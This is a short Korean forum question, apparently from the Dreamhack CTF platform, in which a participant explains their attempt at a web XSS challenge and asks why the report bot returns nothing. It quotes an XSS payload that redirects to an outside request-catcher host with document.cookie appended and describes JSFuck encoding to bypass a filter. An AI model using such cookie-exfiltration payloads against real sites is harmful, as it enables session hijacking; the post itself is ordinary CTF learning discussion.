소스코드를 받아 필터링 조건을 확인했고 /save를 통해 post로 보내면 길이가 길어도 id를 반환한다는 점을 알았습니다.

이 점을 이용해서
'+(location="https://ebbxqev.request.dreamhack.games"+document.cookie)+'에서 필요한 부분만 JSFuck으로 변환하여 payload를 만들고 /save를 통해 전달했습니다.
((location="https://ebbxqev.request.dreamhack.games"+document.cookie) 부분만 JSFuck으로 바꾸고 삽입)

/save에 전달하고 받은 id를 가지고 /saved?id=전달받은 id값 형태로 입력하니 스크립트가 삽입되어 원하는대로 redirect가 잘 되었습니다.

하지만 이 id를 가지고 report에 입력을 했을때는 Dreamhack Tools나 webhook 모두 어떤 응답도 받지 못했습니다.

왜 그런지 이유가 궁금합니다. 어떻게 풀면 좋을까요?

혹시 report에서 URL 값을 바꾸면 문제VM에서 다른 페이지로 요청을 보낼 수 있던데 이 점을 이용하는 문제일까요? 만약 그렇다면 도움이 될만한 키워드를 몇 개 알려주시면 감사하겠습니다.